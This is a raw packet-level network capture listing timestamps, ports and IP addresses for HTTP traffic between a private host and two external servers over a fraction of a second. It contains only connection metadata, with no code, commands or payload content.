Dec 12, 2024 16:48:50.048706055 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.050522089 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.050606012 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.050612926 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.050683975 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.050733089 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.050795078 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.050841093 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.051742077 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.051786900 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.051795959 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.052670002 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.052721977 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.053200960 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.053800106 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.053976059 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.055022001 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.055028915 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.055078983 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.055087090 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.055733919 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.055819988 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.055896997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.056770086 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.056814909 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.057786942 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.057804108 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.057811022 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.057852030 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.058789015 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.058881998 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.059046984 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.059803963 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.059843063 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.059909105 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.060797930 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.060858965 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.061832905 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.061842918 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.061865091 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.061897993 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.062872887 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.062884092 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.063003063 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.063852072 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.063926935 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.063935041 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.064923048 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.064960957 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.065507889 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.065851927 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.065901995 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.066350937 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.066910982 CET	80	49951	185.215.113.43	192.168.2.10
Dec 12, 2024 16:48:50.066920042 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.066978931 CET	49951	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:50.066986084 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.066999912 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.067358971 CET	80	49970	185.215.113.43	192.168.2.10
Dec 12, 2024 16:48:50.067543030 CET	49970	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:50.067939997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.068017960 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.068084955 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.068922997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.068948984 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.069089890 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.069994926 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.070004940 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.070058107 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.070673943 CET	49970	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:50.070940971 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.071013927 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.071960926 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.072024107 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.072031975 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.072072983 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.073007107 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.073241949 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.073385000 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.074027061 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.074139118 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.074165106 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.075026035 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.075078011 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.075762033 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.076014996 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.076091051 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.076098919 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.077107906 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.077203035 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.077554941 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.078077078 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.078138113 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.078531981 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.079083920 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.079226971 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.079292059 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.080136061 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.080178022 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.080187082 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.081154108 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.081304073 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.081373930 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.082175016 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.082269907 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.082941055 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.083117008 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.083210945 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.083255053 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.084153891 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.084279060 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.084496975 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.085238934 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.085269928 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.085406065 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.086203098 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.086340904 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.086978912 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.087207079 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.087215900 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.087290049 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.088212967 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.088237047 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.088591099 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.190536022 CET	80	49970	185.215.113.43	192.168.2.10
Dec 12, 2024 16:48:50.228318930 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.228446960 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.228543997 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.228791952 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.228919029 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.229008913 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.229877949 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.230010033 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.230082035 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.230823040 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.230954885 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.231035948 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.231931925 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.231940985 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.232012033 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.232850075 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.233891010 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.233916998 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.233982086 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.234062910 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.235101938 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.236079931 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.236088991 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.236152887 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.236167908 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.236917973 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.237174988 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.237348080 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.238024950 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.238157034 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.238185883 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.238209009 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.238982916 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.239078045 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.239190102 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.240020990 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.241014957 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.241023064 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.241055012 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.241099119 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.241122007 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.242104053 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.242116928 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.242420912 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.243084908 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.243601084 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.243658066 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.244038105 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.244287968 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.245060921 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.245136023 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.245805025 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.246087074 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.246094942 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.246159077 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.247067928 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.247963905 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.248153925 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.248162031 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.248228073 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.249164104 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.249172926 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.249232054 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.250155926 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.250164986 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.250250101 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.251192093 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.251199961 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.251329899 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.252182007 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.252629042 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.252700090 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.253199100 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.253338099 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.253556967 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.254208088 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.254216909 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.254317045 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.255275011 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.255283117 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.255332947 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.256226063 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.256375074 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.256443024 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.257281065 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.257633924 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.257683992 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.258239985 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.258328915 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.258393049 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.259253025 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.259975910 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.260293961 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.260301113 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.260380030 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.261272907 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.261629105 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.262320042 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.262326956 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.262399912 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.263309002 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.263601065 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.263705969 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.264300108 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.264766932 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.265328884 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.265439987 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.265491962 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.265713930 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.266371012 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.267235041 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.267302990 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.267433882 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.267920971 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.268059969 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.268364906 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.268668890 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.269474030 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.269504070 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.269522905 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.269552946 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.270451069 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.271428108 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.271435976 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.271466970 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.271496058 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.271522999 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.272423029 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.272620916 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.272689104 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.273550034 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.273556948 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.273612976 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.274472952 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.274661064 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.274945974 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.275456905 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.275837898 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.276527882 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.276618004 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.276768923 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.277542114 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.277549028 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.277823925 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.278578997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.279639959 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.279647112 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.279654980 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.279720068 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.280772924 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.281614065 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.281713963 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.282094002 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.420614004 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.420692921 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.420717955 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.421073914 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.421127081 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.421773911 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.422086954 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.422199011 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.422238111 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.423127890 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.423177004 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.423186064 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.424110889 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.424201965 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.424251080 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.425148010 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.425198078 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.425777912 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.426176071 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.426223040 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.426331997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.427231073 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.427325010 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.427659035 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.428229094 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.428322077 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.428383112 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.429197073 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.429250002 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.430085897 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.430224895 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.430232048 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.430289030 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.431241989 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.431353092 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.431446075 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.432238102 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.432291031 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.433255911 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.433264017 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.433303118 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.433345079 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.434256077 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.434468031 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.434552908 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.435296059 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.435364962 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.435467958 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.436707020 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.437062025 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.437129974 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.437325954 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.437410116 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.437443018 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.438333035 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.438625097 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.439285040 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.439332008 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.439378023 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.439604998 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.440356970 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.440752029 CET	80	49946	185.81.68.147	192.168.2.10
